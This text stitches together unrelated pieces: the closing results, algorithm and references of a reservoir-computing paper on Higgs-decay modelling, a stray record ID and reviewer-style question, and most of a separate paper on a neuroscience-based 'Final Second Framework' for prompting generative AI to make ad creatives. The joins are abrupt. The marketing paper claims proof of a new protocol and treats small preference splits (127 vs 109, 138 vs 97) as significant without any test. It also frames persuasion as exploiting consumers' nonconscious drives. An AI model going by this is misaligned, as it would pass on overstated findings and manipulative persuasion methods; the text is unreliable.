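                e = C_G @ np.tanh(X_G) - C_L @ np.tanh(X_L) - w_out @ p_t
                C_G, P = rls_forget_update(C_G, P, e, X_L, lam)   # Step 3
        pairs.append((C_G, w_in, w_out))
    return pairs
```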
3 RESULTS AND DISCUSSION

Table 1 shows the comparison between our proposed R-i-R architecture and the existing reservoir architectures ESN, FORCE, and full-FORCE. Our architecture outperforms the existing reservoir architectures in MSE for all three reservoir sizes. While ESN, FORCE and full-FORCE tend to perform better only with larger network sizes, R-i-R is designed to process an incoming system in parts, shared by its constituent l-g pairs. Hence, for a given window length and its aperiodicity, R-i-R finds a sweet spot to perform optimally with adaptable forgetting. Larger network sizes in turn increase firing-rate activity, as mentioned in the Methods section. Note that our architecture is designed with the objective of reducing computation cost and keeping the network size minimal while still achieving SOTA results.

Table 2 shows the comparison with SOTA system identification algorithms, namely pySINDy, GPLearn and MCTS. While pySINDy outperforms GPLearn and MCTS, our architecture outperforms all three. This performance improvement as a data-driven approach to system identification can be partly attributed to its minimal dependence on prior knowledge of the dynamics of particle decay. Additionally, the re-triggering of training of the l-g pairs, with adaptable forgetting depending on the changing aperiodicity and firing rates of the recurrent connectivity, helps keep the overall error rate low. The reported MSE values are averages over 10 trials each. This establishes that the architecture shows promise in adaptive, real-time system identification, with a much lower memory requirement than library-driven or tree-search-based approaches.

In Figure 4, the transformations in the recurrent connectivity matrix (\( C_G \)) within the generator reservoirs are observed before and after training, with a focus on its original form (\( C_L \)). Initially, the eigenvalues of \( C_L \) are predominantly clustered within a wide region of -4 to 2. After training, they converge within a smaller region of -2 to 1, with fewer than 500 recurrent nodes. Learner reservoirs with real parts initially exceeding 1 tend to gravitate towards real parts closer to 0 during the learning process, consistent with the stabilization attribute mentioned earlier. In the testing phase, no alterations to the internal connectivity of the generator reservoirs take place; only upon exceeding an error threshold is an l-g pair reactivated. This results in alterations to the existing eigenvalues, as depicted in subplot e) of Figure 5, but convergence occurs much earlier, with approximately 350 recurrent nodes, ensuring comprehensive real-time stability.

Algorithm 2: Generating a dynamic system pattern in real time

Begin testing

Step 4: Generate outputs from each reservoir in the pool.
groundtruth = \( p(t \ldots T) \), totalerror = 0, totaloutput = 0, error = 0, Variance = 0, totalVariance = 0, Window = \( W_i \) = 0, Threshold = threshold, timelength = \( t_l \)

for \( i=1,2,\ldots,n \) do
  for trial = 1, ..., trials do
    \[ p_i'(t) = w_{readout}^T\tanh(X_{Gn}(t)) \tag{22} \]
    \[ error = error + (p_i'(t) - p_i(t))^T(p_i'(t) - p_i(t)) \tag{23} \]
    \[ Variance = Variance + p_i(t)^T p_i(t) \tag{24} \]
  end
  \( NE_i = error/Variance \)
  \( W_i = W_i \cup p_i'(t_0 \ldots t_l) \)
end

totaloutput = \( \bigcup_i W_i \)
totalerror = totalerror + (totaloutput - groundtruth)^T(totaloutput - groundtruth)
totalVariance = totalVariance + groundtruth^T groundtruth
NE = totalerror/totalVariance

if NE > Threshold then
  Load \( L_k, G_k \): the learner-generator pair \( k \) is determined based on which generator (\( G_k \)) obtains the lowest NE in the previous steps of testing
  call Training
end
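The NE monitoring and re-trigger rule of Algorithm 2 reduces to a few lines; in this sketch, `retrain` and the array inputs are caller-supplied placeholders:

```python
import numpy as np

def normalized_error(pred, truth):
    """NE = total squared error over total variance of the ground truth."""
    return np.sum((pred - truth) ** 2) / np.sum(truth ** 2)

def maybe_retrigger(total_output, ground_truth, pair_nes, retrain, threshold=1.0):
    """Algorithm 2's rule: retrain one l-g pair when the pooled NE exceeds threshold."""
    if normalized_error(total_output, ground_truth) > threshold:
        k = int(np.argmin(pair_nes))   # generator with the lowest NE so far
        retrain(k)                     # caller-supplied: rerun training for pair k only
```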
4 CONCLUSION

Our novel RC paradigm for ML-driven system identification in particle physics, elucidating Higgs boson decay phenomena, reveals that conventional RLS-driven loss-function minimization has limitations in achieving real-time adaptability to space-time-varying nonlinear dynamic systems. We introduce a vector-forgetting-based covariance matrix update tailored to mitigate covariance wind-up. Our R-i-R architecture pioneers real-time adaptability in a data-driven, black-box learning context, offering significant network-size reduction and enhanced performance. Upon acceptance, we will open-source our code base for reproducibility, facilitating further insights and the exploration of complex decay trajectories and parameters beyond lepton momentum.

| Algorithm | MSE |
|----------------------------------|-------|
| Reservoir-in-Reservoir (Ours) | 0.87 |
| pySINDy [Brunton et al., 2016] | 71.99 |
| GPLearn [Ferreira et al., 2019] | 72.014 |
| Monte Carlo Tree Search [Sun et al., 2022] | 72.009 |

Table 2: Mean squared error obtained from benchmarking against state-of-the-art system identification algorithms. Each metric is obtained over 10 trials.

REFERENCES

Georges Aad, Tatevik Abajyan, B Abbott, J Abdallah, S Abdel Khalek, Ahmed Ali Abdelalim, R Aben, B Abi, M Aiolins, OS AbouZeid, et al. Observation of a new particle in the search for the standard model higgs boson with the atlas detector at the lhc. *Physics Letters B*, 716(1):1–29, 2012.

Flavio Abreu Araujo, Mathieu Riou, Jacob Torrejon, Sumito Tsunegi, Damien Querlioz, Kay Yakushiji, Akio Fukushima, Hitoshi Kubota, Shinji Yuasa, Mark D Stiles, et al. Role of non-linear data processing on speech recognition task in the framework of reservoir computing. *Scientific Reports*, 10(1):328, 2020.

Fedor Bezrukov. The higgs field as an inflaton. *Classical and Quantum Gravity*, 30(21):214001, 2013.

Stephen A Billings. *Nonlinear System Identification: NARMAX Methods in the Time, Frequency, and Spatio-Temporal Domains*. John Wiley & Sons, 2013.

Cameron B Browne, Edward Powley, Daniel Whitehouse, Simon M Lucas, Peter I Cowling, Philipp Rohlfshagen, Stephen Tavener, Diego Perez, Spyridon Samothrakis, and Simon Colton. A survey of monte carlo tree search methods. *IEEE Transactions on Computational Intelligence and AI in Games*, 4(1):1–43, 2012.

O Brüning, H Burkhardt, and S Myers. The large hadron collider. *Progress in Particle and Nuclear Physics*, 67(3):705–734, 2012.

Steven L Brunton, Joshua L Proctor, and J Nathan Kutz. Sparse identification of nonlinear dynamics with control (sindyc). *IFAC-PapersOnLine*, 49(18):710–715, 2016.

Linda Carpenter, Anthony DiFranzo, Michael Mullhearn, Chase Shimmin, Sean Tulin, and Daniel Whiteson. Mono-higgs-boson: A new collider probe of dark matter. *Physical Review D*, 89(7):075017, 2014.

María Cepeda, Stefania Gori, Verena Ingrid Martinez Outschoorn, and Jessie Shelton. Exotic higgs decays. *Annual Review of Nuclear and Particle Science*, 72:119–149, 2022.

CMS Collaboration. A portrait of the higgs boson by the cms experiment ten years after the discovery. *Nature*, 607(7917):60–68, 2022.

CMS Collaboration et al. Observation of a new boson at a mass of 125 gev with the cms experiment at the lhc. *arXiv preprint arXiv:1207.7235*, 2012.

Glen Cowan. Review of particle physics. *Phys. Rev. D*, 86(010001):390, 2012.

Bruce Denby. Neural networks in high energy physics: a ten year perspective. *Computer Physics Communications*, 119(2-3):219–231, 1999.
Brian DePasquale, Christopher J Cueva, Kanaka Rajan, G Sean Escola, and LF Abbott. full-force: A target-based method for training recurrent networks. *PloS one*, 13(2):e0191527, 2018. Lea Duncker, Gergo Bohner, Julien Boussard, and Maneesh Sahani. Learning interpretable continuous-time models of latent stochastic dynamical systems. In *International Conference on Machine Learning*, pp. 1726–1734. PMLR, 2019. Saso Dzeroski and Ljupco Todorovski. Discovering dynamics: from inductive logic programming to machine discovery. *Journal of Intelligent Information Systems*, 4:89–108, 1995. Jimena Ferreira, Martín Pedemonte, and Ana I Torres. A genetic programming approach for construction of surrogate models. In *Computer Aided Chemical Engineering*, volume 47, pp. 451–456. Elsevier, 2019. TR Fortescue, Lester S Kershenbaum, and B Erik Ydstie. Implementation of self-tuning regulators with variable forgetting factors. *Automatica*, 17(6):831–835, 1981.
eR4W9tnJoZ
How is this study different from previous efforts studying the use of neuromarketing methods vs. plain advertisements like the ones shown to the participants (plain background with the product in the middle)? Is the novelty of the work the use of ChatGPT to generate the ad creatives?
VISUO-EMOTIONAL PERCEPTION AND HUMAN COGNITION TO ENGINEER CONTENT GENERATION USING GENERATIVE AI

Anonymous authors
Paper under double-blind review

ABSTRACT

Media platforms compete for users' attention. Their reach crucially depends on algorithmic real-time bidding and the efficiency of hyper-personalised, rapidly generated, and user-optimised content. Attention is, however, a scarce and fleeting quantity, often awarded less than 1 second per stimulus. The current strategy is therefore to rely on the vast amount of user-generated data to tailor content to the user, under the assumption that this is sufficient incentive for attention. This strategy has evidently failed, as witnessed by the alarmingly low or short-lived successes of campaigns in recent times. The mismatch is exacerbated because most content consumed today is digital, whereas strategies for digital content mimic our past understanding of mass media. Hence, we formalise a new understanding of communication, specifically for digital media. We prove that the digital medium demands a new understanding of communication protocols, and we take a first-principles approach to this new communication protocol: the neurological representations of communication, specifically where the communication happens in less than 1 second per stimulus. First, we break down and elaborate on this neurological representation of decision-making. Next, we propose the use of our behavioural communication model for the generation and optimisation of content creatives. To that end, we elaborate methods for rapid, AI-generated content, increasing the efficiency of visual communication on digital media. Within this exploration we include the themes of hyper-personalisation and search-engine optimisation. We find that strategically produced content exhibits stronger associations with users' nonconscious needs, wants and goals, which elicits user attention and content diversity significantly.

1 INTRODUCTION

In the book Subprime Attention Crisis, Tim Hwang highlights the ineffectiveness of digital advertising. He calls digital advertising "the beating heart of the Internet", but one that is about to collapse. The author compares the click-through rates (CTRs) of the first digital ad, released in 1994, to the click-through rates of digital advertising in 2018. The famous "You Will" ad (Figure 1) was released on the popular tech blog hotwired.com (now Wired.com). Over the next two months, the ad garnered a CTR of 44%, i.e., one in two people who saw the ad clicked on it. A CTR of 44% is unheard of today, when the average for display ads lingers at sub-1% (0.48% in 2018, 0.35% in 2022). Hence, digital communication today is over 100 times less effective than it was 20 years ago (Marino, 2023; Hwang, 2020).

Figure 1: First digital ad in the world.

This ineffectiveness warrants technological interventions such as:

- Real-Time Bidding,
- Ad Personalisation or Targeted Ads,
- Search-Engine Optimisation, and
- Dynamic Content Optimisation

1.1 PAST METHODS OF PERSONALISATION

To improve the effectiveness of digital ads, in 2014 Google deployed real-time bidding for its ad spaces. Real-time bidding allows advertisers to manage and optimise ads from multiple ad networks, enabling them to create and launch campaigns via an instantaneous programmatic auction. In other words, the viewer is exposed to "the right product, at the right time". Search-engine optimisation (SEO) likewise aims to optimise online content by keywords.
The principle of SEO is that there is a direct, increasing correlation between the number of keywords in the content and the probability that the content will be clicked on and consumed. A third method used to present "the right content at the right time" is personalisation. Personalisation in communication aims to make communication relevant to the user by incorporating elements of the user's identity into the content or creatives. With personalised ads, also called targeted ads, consumer insights increase the relevancy of the ads presented to the consumer (Meta). Yet while the war for users' attention rages on, with delivery growing ever more precise and accurate, CTRs continue to decline, from 0.48% in 2018 to 0.35% in 2022. The average cost per click (CPC) and cost per impression (CPI) of display ads continue to rise; hence the conclusion that online ads mostly fail to work (Marino, 2023).

1.2 THE ADOPTION OF GENERATIVE AI

Generative AI methods are evolving rapidly, and text-to-image diffusion models make it possible to generate images simply from text input (Ramesh et al., 2022; Rombach et al., 2022; Saharia et al., 2022). This alone has shown incredible promise in scaling up the effort to create visual content at incredible speeds. However, one of the fallacies of technological advancement is the assumption that large-scale adoption will follow automatically. Most recently we saw this with the COVID-19 vaccines: their discovery and scaled production were achieved in record time (Boyle, 2021), yet there was still significant hesitation globally to "take the shot". When we observe the hesitant adoption of even simpler technologies, such as the reluctance linked to the recent COVID-19 vaccination or the persistence of open defecation in rural India despite access to clean toilets, it warrants the anticipation that AI-based image generation may not move beyond experimental and recreational use and a short-lived hype on its own (Boyle, 2021; Sharma, 2021). Technology giants such as Google and Microsoft are not immune to this either, having dozens of product failures under the names of the Google Graveyard and the Microsoft Morgue, respectively (McCracken, 2012).

In this paper, we marry text-to-image generation with the centuries-old practice of visual storytelling to create truly compelling creatives. Indeed, one of the first areas of research was visual perception and how the brain processes and represents visuals, even those generated by AI (Churchland et al., 1994). We look at how to utilise text-to-image generation as an effective storytelling tool, with the significant advantage of using generative AI to illustrate stories. Algorithmic personalisation, such as dynamic content optimisation and contextual multi-arm bandit approaches, strengthens the prospect of leveraging generative AI at an unprecedented scale.

1.3 MICROSTIMULI FOR THE DIGITAL MEDIUM

In addition to the art and science of storytelling, most communication today happens through the digital medium, specifically smartphones. The human brain has evolved over 600 million years. Hence, it makes sense that the human brain most often resorts to perceptual behaviours stemming from how our early hominid ancestors interacted with their environment (Bennett, 2021). Radio, television, the Internet, smartphones, and indeed most modern technology (what we classify as digital media) emerged only in the last 100 years. Since the launch of the smartphone in 2007, it has been the spearheading medium of the new digital revolution.
As of 2023, there are recorded estimates of 6.84 billion smartphones in use around the world (Howarth, 2023). Global smartphone penetration is estimated at 67%, with an annual growth rate of 10% per year (Howarth, 2023). With the sheer omnipresence of the smartphone, it has become the final mile for all digital interactions. Hence, this paper focuses on the use of GenAI through the lens of the digital medium of smartphones. Recent studies have shown that the context duration on digital media is fleeting: studies by Netflix and Facebook have found the duration of digital decisions to be 1.7 seconds and 1.8 seconds, respectively (FacebookIQ; Netflix). To address the ineffectiveness of creative content in the digital medium, this paper investigates facets of the neuroscience of decision-making in the (digital) medium. Understanding the processes in the brain gives us insight into which information is crucial for firing which decision process in the brain. Identifying these constituents allows us to design appropriate stimuli that can create the desired response. We propose that this integration of neuroscience and generative artificial intelligence can help influence smarter, better decisions, such as the adoption of important behaviours like medication adherence, physical activity, and night brushing. In addition, we see applications of the proposed schema in the digital marketing of simpler goods and services by increasing CTRs and conversions: the specific areas of focus in this paper.

1.4 TO SOLVE THE PROBLEM WE START WITH THE MEDIUM

Studies conducted across different demographics and age groups show an upward trend in the time spent using a smartphone every single day. Earlier studies found that people use their phones on average for about 3 hours and 36 minutes (Anonymous, 2023). But while the time spent on our phones increases, there is a key interaction metric: the touches on the smartphone screen. In 2016, a study reported that people touch their phones 2617 times a day (dscout). A more recent study, in 2023, found the new number of touches per day to be 4513 (Anonymous, 2023). The increased frequency of touches implies a dramatic drop in the time for which any content stays on the screen: each piece of editorial content is in front of the user for only a very short duration. To understand the editorial context duration of the smartphone medium, this study recorded touch-interval data from smartphone users. The data indicated that 90% of consecutive touches happened in less than 5 seconds and 95% happened in less than 10 seconds (Anonymous, 2023). This indicates that the editorial context duration of the smartphone is only 5-10 seconds. In comparison, the context duration of the television medium is 5-21 minutes (Cha et al., 2008). For television, a 30-second commercial fits into the subset of this large context duration. On smartphones, however, with a limited context-duration window of 5-10 seconds, we need a persuasion stimulus that creates an impact in milliseconds: a MicroStimuli (Anonymous, 2023).
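The reported shares of sub-5-second and sub-10-second touch intervals can be computed from raw per-user touch timestamps along these lines (a sketch; `timestamps` is an assumed array of touch times in seconds):

```python
import numpy as np

def touch_interval_shares(timestamps):
    """Share (%) of consecutive touch intervals under 5 s and under 10 s."""
    gaps = np.diff(np.sort(np.asarray(timestamps, dtype=float)))
    return np.mean(gaps < 5.0) * 100.0, np.mean(gaps < 10.0) * 100.0
```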
While the concept of MicroStimuli operating in milliseconds on smartphones may seem novel to the conscious mind, it is actually a prevalent aspect of Nature that has been evolving for billions of years. The pioneering work of Nobel laureate Nikolaas Tinbergen illuminated the concept of Supernormal Stimuli (Tinbergen, 2020). Tinbergen's research revealed how these stimuli possess the remarkable ability to induce fixed action patterns in organisms within mere milliseconds. For instance, male stickleback fish exhibit aggressive behaviours toward the red coloration of a competing male's underbelly during the breeding season. When presented for an extended period with a red object featuring even more intense red coloration and exaggerated proportions, the male sticklebacks displayed heightened aggression, sometimes to the point of exhaustion. This phenomenon in stickleback behaviour, where exaggerated and prolonged stimuli trigger heightened responses, offers intriguing parallels to human behaviour and the concept of Fixed Action Patterns: instinctual, pre-programmed sequences of actions triggered by specific stimuli. These patterns are deeply ingrained in our biology and psychology, and they can be observed in various aspects of human behaviour, from social interactions to decision-making processes. To provide insight into the time frames associated with decision-making, we compare reflexes and reactions within our bodies, as shown in Fig. 2. Human reflexes are remarkably rapid, transpiring in approximately 50 milliseconds, and are managed solely by the spinal cord, bypassing the brain entirely (McLeod, 1987). In the domain of cricket, a batsman needs roughly 450 milliseconds to determine the appropriate shot (McLeod, 1987). The MicroStimuli we have developed to aid purchase decisions operate within 920 milliseconds (Anonymous, 2023). Selecting a series or film on Netflix requires a decision time of 1.8 seconds (Netflix). Allocating a donation of USD $1000 to an NGO entails a more reflective 2.5 seconds (Maoz et al., 2019). These diverse scenarios illustrate that, in terms of time, MicroStimuli are ubiquitous and intrinsic components of nature.

Figure 2: Range of reaction times from reflexes to reactions in the human body.

All long-duration decisions are combinations of numerous micro-decisions. Evidence for this statement comes from multiple studies across sports and neuroscience. For instance, a batter dedicates 220 ms to discerning the incoming ball's trajectory, a mere 10 ms to shot determination, and a further 220 ms to executing the shot (McLeod, 1987). The batter's response to the ball's movement and the subsequent shot selection thus act as micro-decisions within the broader context of playing the shot. In the realm of neuroscience, findings suggest that the perceived value of a potential outcome is synthesised from its foundational attributes (O'Doherty et al., 2021).

2 FIRST PRINCIPLES APPROACH

In the rapidly evolving landscape of e-commerce, understanding the intricacies of consumer decision-making is crucial. To address the challenge of low click-through rates (CTRs) and enhance the effectiveness of e-commerce persuasion, we propose the Final Second Framework. At its core, our framework adopts a first-principles approach, seeking to uncover the fundamental building blocks of the decision-making process in the final seconds before a purchase decision is made. The product tile is the most repeated stimulus across the e-commerce consumer journey. Displayed on the search page, the product display page, and even the cart, the product tile, often a simple image against a white background, represents the final mile of persuasion in the buyer's journey.
To comprehend the rapidity of this stage, we delve into the neuroscience of visual processing. It has been found that the brain's initial response to any stimulus is to either approach or avoid it, a process that occurs within 350 milliseconds (LeDoux & Bemporad, 1997; Carter, 2019). At this stage, the buyer decides whether the product, among all the others, deserves any attention. The next step in decision-making is the feeling of Liking, which is influenced by a buyer's positive past experiences with a product and occurs within the next 100 milliseconds, at 450 milliseconds (Berridge & Robinson, 2016). In the Liking stage, the buyer forms the consideration set for the category. At the final stage, since Liking alone does not motivate us to act, the 'Wanting' stage drives the 'buy now' or 'add to cart' action; this occurs within the next 470 milliseconds (Berridge, 1999; Braeutigam et al., 2001). In total, the entire decision-making process for an e-commerce purchase can transpire in just 920 milliseconds (Anonymous, 2023).

3 NEW COMMUNICATION PROTOCOL

To effectively implement the Final Second Framework, we introduce a novel communication protocol that explains how these brain processes can be triggered. First, we evoke an approach response by playing up the evolutionary category need. Categorisation represents the brain's initial phase when assessing any stimulus (Murphy). Notably, a significant 69% of purchase decisions on popular shopping platforms like Amazon.com commence with a category search (Szahun & Dalton). Based on these findings, we suggest that stimulating the evolutionary category need of the product is an ideal way to facilitate the approach response in the buyer's brain. Subsequently, we attain the feeling of Liking by invoking memories associated with the brand (Berridge & O'Doherty, 2014). Therefore, employing brand logos, adhering to brand guidelines, and utilising brand colors serve as cues to foster this sense of Liking in the hedonic centers of the brain. Finally, 'Wanting' is generated through incentive salience. Brain structures fuelled by dopamine (i.e., the mesolimbic system associated with incentive salience) come into play to create 'Wanting'. This incentive salience can be accomplished by activating the strongest emotional memory tied to the brand and enhancing the perception of reward (Anonymous, 2022). The entire decision process is illustrated in Fig. 3.

Figure 3: Final Second Framework

4 CREATING MICROSTIMULI AT SCALE USING GENERATIVE AI

With the advent of diffusion models for image generation, there is a tremendous opportunity to leverage this technology to create personalised creatives at scale, enhance workplace productivity for creative roles, and transform digital marketing. To make this technology a standard in the industry, businesses and brands must adopt it. However, to use these models effectively for businesses, certain guardrails need to be in place to ensure the generation of consistent and meaningful images tailored for smartphones, the primary interface for human-machine interactions. In the traditional marketing industry, the creative briefs provided to ad agencies have been crucial for over a century. These briefs define the objectives for creatives, enabling skilled designers to consistently create persuasive stimuli aligned with the brand strategy. To fully integrate generative AI into marketing, it is essential to provide equally effective guidelines for AI systems to generate creatives.
Prompt engineering, a skill typically possessed by creative individuals, is vital to unlocking the full potential of generative AI in the digital communication domain. Despite technological advancements, the utilisation of generative AI in the digital marketing community remains limited. Therefore, we propose a prompting strategy that bridges the gap between communication strategy and AI-generated creatives. This prompt strategy is rooted in the neuroscience of visual stimulus processing and aims to expedite the creation of end creative materials while meeting the demand for efficient communication in the digital world. The proposed prompt strategy serves a dual purpose. First, it enables machines to consistently generate visually appealing creatives. Second, and most importantly, it revolutionises marketing practices and enhances customer engagement by creating MicroStimuli: stimuli that trigger decision-making processes in the human brain, leading to action.

Constructs of the Prompt Strategy (a programmatic sketch follows at the end of this section):

1. **Evolutionary category need:** When constructing a prompt for generating images from text, it is important to highlight the subject alongside a complementary and relevant style (Liu & Chilton, 2022). Emphasising the evolutionary category need of the subject heightens the processing of the visual and creates vivid imagery. For example, the core category need of soft drinks is the ability to quench thirst, which can be visually represented by condensed water droplets on the bottle.

2. **Past memories associated with the brand:** It is crucial to include well-defined brand guidelines, encompassing aspects such as brand color schemes, brand logos and product specifications, in the prompt. These repeated motifs, deeply tied to the image of the brand, evoke past memories associated with the brand. This allows brands to maintain consistency in representation while enabling the subjective feeling of pleasure in familiar users.

3. **Strongest emotional memory:** Vivid and emotionally compelling imagery can be attributed to incentive salience and is believed to exert motivational influences, so explicitly calling out the emotional high in the prompt is recommended.

4. **Context with photographic details:** To elevate the caliber and aesthetics of images generated by generative AI, it is imperative to incorporate additional prompt modifiers. This entails offering comprehensive contextual information for photography and clearly defining the desired image environment. Many remarkable visual outcomes created by generative AI and shared online have been attributed to the inclusion of pertinent artistic and photographic directives within the prompt (McCue, 2023).

In Fig. 4, we describe the proof of concept for our prompt strategy. In Fig. 4(a), the designs are generated from a prompt written by ChatGPT for a digital Coke ad: "Design a compelling digital advertisement for Coca-Cola that demonstrates the brand's enduring appeal and widespread popularity. Highlight the iconic Coca-Cola logo and imagery in a way that seamlessly blends nostalgia with modernity. Incorporate dynamic visuals, catchy music, and a sense of global unity to convey the message that Coca-Cola is a universally recognised symbol of refreshment and enjoyment. Your ad should evoke a feeling of timelessness and cultural resonance, emphasising how Coca-Cola has remained a beloved choice for generations and continues to bring people together in a digital age."
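As promised above, here is a minimal sketch of how the four constructs might be assembled into a single generation prompt. The field values below are illustrative, following the Coca-Cola example, and `--ar` is the aspect-ratio flag used by some text-to-image tools:

```python
def build_prompt(category_need, brand_memory, emotional_memory, photo_context, ar="1:1"):
    """Join the four Final Second Framework constructs into one text-to-image prompt."""
    parts = [category_need, brand_memory, emotional_memory, photo_context]
    return ", ".join(parts) + f" --ar {ar}"

prompt = build_prompt(
    category_need="a coke bottle with effervescence and water droplets",
    brand_memory="product photography, brand-red palette",
    emotional_memory="person drinking coke on a beach mat, looking refreshed",
    photo_context="beach volleyball in the background, natural lighting, center composition",
)
```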
In Fig. 4(b) we used our prompt strategy to create a MicroStimuli. Evolutionary category need: a coke bottle with effervescence and water droplets. Past memories associated with the brand: product photography, F40009. Strongest emotional memory: a person drinking Coke sitting on a beach mat, looking refreshed. Context with photographic details: view of the beach and people playing volleyball in the background, natural lighting, center composition, --ar 1:1. In Fig. 4(c) we overlay the brand assets on the generated image. From Fig. 4 we can observe significant leaps in the generative AI creative achieved with the prompt strategy.

Figure 4: Proof of concept for the prompt strategy. (a) prompt generated by ChatGPT for a digital Coke ad, (b) prompt strategy used to create a MicroStimuli, and (c) brand assets overlaid on the generated image.

5 EXPERIMENTAL SETUP

In this research, a Pairwise Comparison (PC) test was executed, in which an online form was developed to simulate a purchasing scenario. The form was segmented into four principal sections:

1. The initial section required subjects to enter their name, email ID, age, and city of residence.
2. The subsequent section established an e-commerce context, prompting subjects to place an item in their cart.
3. In the third segment, subjects were shown an image of the product against a white background along with a designer-created creative for a disinfectant, utilising the Final Second Framework. The specific creatives deployed are depicted in Fig. 5.
4. The final section displayed an image of the product, set against a white background, accompanied by a creative for a cold drink. This creative was generated using a prompt strategy built on the Final Second Framework and underwent minimal alterations by a designer to align with brand guidelines. The creatives utilised are illustrated in Fig. 6.

The study was centered on two core research inquiries:

1. To assess the impact of the Final Second Framework on the brain's decision-making mechanism.
2. To analyse the efficacy of the prompt strategy built on the Final Second Framework for designing a creative with generative AI.

Figure 5: Creatives presented to the subjects for choosing a disinfectant. (Option 1) Product tile of a disinfectant. (Option 2) Creative for a disinfectant created by a designer using the Final Second Framework.

6 RESULTS AND ANALYSIS

Our randomised sample consisted of a total of 236 individuals who filled in the online form. The distribution of age among the subjects is illustrated in Fig. 7, revealing a median age of 27 and an age range spanning from 21 to 55. The majority of the subjects are digital natives, predominantly falling within the 23-35 age bracket. The demographic data described in Fig. 8 represent the geographical distribution of participants across various countries. Most participants are from India, accounting for 216 individuals, indicating a significant representation from this region. Following India, the United States has the next highest representation with 5 participants. The United Kingdom is represented by 3 participants, and Canada by 2 participants. Australia, France, Italy, Mexico, Ukraine, and the United Arab Emirates each have 1 participant, showing minimal representation from these countries. This distribution illustrates a predominantly Indian demographic, with sparse representation from other regions around the globe.
Figure 6: Creatives presented to the subjects for choosing a cold drink. (Option 1) Creative for a cold drink generated by generative AI using the Final Second Framework. (Option 2) Product tile of a cold drink.

Figure 7: Distribution of age of the subjects.

Figure 8: Distribution of country of residence of the subjects.

In the study, subjects were given a choice between two distinct options in two separate scenarios. In the first scenario, subjects chose between the present product tile and the designer-created creative based on the Final Second Framework. The results indicated a preference for the Final Second Framework creative, with 127 selections, compared to the present product tile, which received 109 selections; that is, the designer-created Final Second Framework creative exceeded an even 50/50 split by roughly 4 percentage points (127/236, approximately 53.8%). The pie chart describing the results is shown in Fig. 9(a). In the second scenario, subjects chose between the present product tile and the creative generated by generative AI using a prompt strategy built on the Final Second Framework. In this instance, the generative AI creative was favored, garnering 138 selections, whereas the present product tile was chosen 97 times; here the Final Second Framework creative exceeded an even split by roughly 9 percentage points (138/235, approximately 58.7%). The pie chart describing the results is shown in Fig. 9(b). These results suggest a notable inclination of subjects towards the Final Second Framework options in both scenarios, indicating a perceived value in these choices over the present product tile. The outcomes of the study illustrate a prevailing preference for the Final Second Framework over the present product tile in decision-making scenarios. The Final Second Framework, integrating neuroscience and artificial intelligence, thus shows promise as an approach for shaping consumer choices.

7 SUMMARY AND CONCLUSION

The aim of our study was to investigate whether neuroscientifically designed content (tailored to the final seconds of decision-making) significantly elicits user attention and can be scaled using generative AI. To build our Final Second Framework, we used a first-principles approach to better understand the final seconds of an e-commerce purchase. The consumer begins by either Approaching or Avoiding the stimulus, which we evoke by highlighting the core category need of the product. Next comes the feeling of Liking, which we further emphasise by invoking memories of the product or similar products using the brand guidelines. Finally, the user ideally reaches the Wanting phase, which leads to Action (purchase). Building on this framework, we used these principles to build a structure for the prompt strategy:

1) The evolutionary category need, which heightens the processing of the visual and creates vivid imagery.
2) Past memories, brand guidelines, and important motifs the brand uses to maintain consistency.
3) Strongest emotional memory, where making clear the emotional high of the product motivates the consumer to want it.
4) Context with photographic details, where prompt modifiers and quality boosters define the style, dimensions, and overall visual appeal of the image.

In this study, we applied this framework to a simulated purchase on an e-commerce platform. As discussed in the results section, the outcome of the experiments confirmed our hypothesis that the MicroStimuli-centric option is preferred by users: in both scenarios, subjects preferred the MicroStimuli design by a considerable margin. These results therefore met our expectations and supported our hypotheses. The findings are relevant to the future of e-commerce, as the sharp rise in phone interactions has compromised our attention spans, and understanding how to accommodate these new conditions is imperative for successful e-commerce campaigns.

REFERENCES

Putting a finger on our phone obsession. URL https://dscout.com/people-nerds/mobile-touches.

Neuroscience for kids - reflexes. URL https://faculty.washington.edu/chudler/chreflex.html.

Ahmed H. Alsharif, Nor Zafir Salleh, Mazilah Abdullah, Ahmad Khraiwish, and Azmirul Ashaari. Neuromarketing tools used in the marketing mix: A systematic literature and future research agenda. *SAGE Open*, 13(1), 2023. doi: 10.1177/21582440231156563.

Anonymous. Role of visual stimuli in final seconds of decision-making. *Cognitive Computational Neuroscience Conference, 2022, San Francisco*, 2022. URL https://doi.org/10.32470/ccn.2022.1318-0. Last accessed 29 May 2023.

Anonymous. Fostering effective communication between humans and machines, May 2023. URL https://openreview.net/forum?id=AHnLJBD7xKX.

Antonio Baraybar-Fernández, Miguel Baños-González, Óscar Barquero-Pérez, Rebeca Goya-Esteban, and Alexia De-la Morena-Gómez. Evaluation of emotional responses to television advertising through neuromarketing. *Comunicar: Revista Científica de Comunicación y Educación*, 25(52):19-28, 2017.

Max S. Bennett. What behavioral abilities emerged at key milestones in human brain evolution? 13 hypotheses on the 600-million-year phylogenetic history of human intelligence. *Frontiers in Psychology*, 12, 2021. doi: 10.3389/fpsyg.2021.685853.

Kent C. Berridge. Pleasure, pain, desire, and dread: Hidden core processes of emotion. 1999.

Kent C. Berridge and John P. O'Doherty. From experienced utility to decision utility. In *Neuroeconomics*, pp. 335-351. Elsevier, 2014.

Kent C. Berridge and Terry E. Robinson. Liking, wanting, and the incentive-sensitization theory of addiction. *American Psychologist*, 71(8):670, 2016.

Patrick Boyle. Covid-19 vaccines were developed in record time. Can we make future vaccines even faster?, Jul 2021. URL https://www.aamc.org/news/covid-19-vaccines-were-developed-record-time-can-we-make-future-vaccines-even-faster.

Sven Braeutigam, John F. Stins, Steven P. R. Rose, Stephen J. Swithenby, Tim Ambler, et al. Magnetoencephalographic signals identify stages in real-life decision processes. *Neural Plasticity*, 8:241-254, 2001.

Rita Carter. *The brain book: An illustrated guide to its structure, functions, and disorders*. Dorling Kindersley Ltd, 2019.

Meeyoung Cha, Pablo Rodriguez, Jon Crowcroft, Sue Moon, and Xavier Amatriain. Watching television over an ip network. In *Proceedings of the 8th ACM SIGCOMM conference on Internet measurement*, pp. 71-84, 2008.

Patrizia Cherubino, Ana C. Martinez-Levy, Myriam Caratu, Giulia Cartocci, Gianluca Di Flumeri, Enrica Modica, Dario Rossi, Marco Mancini, Arianna Trettel, et al.
Consumer behaviour through the eyes of neurophysiological measures: State-of-the-art and future trends. *Computational Intelligence and Neuroscience*, 2019, 2019.

Patricia S. Churchland, Vilayanur S. Ramachandran, Terrence J. Sejnowski, Christof Koch, and J. Davis. Large-scale neuronal theories of the brain, 1994.

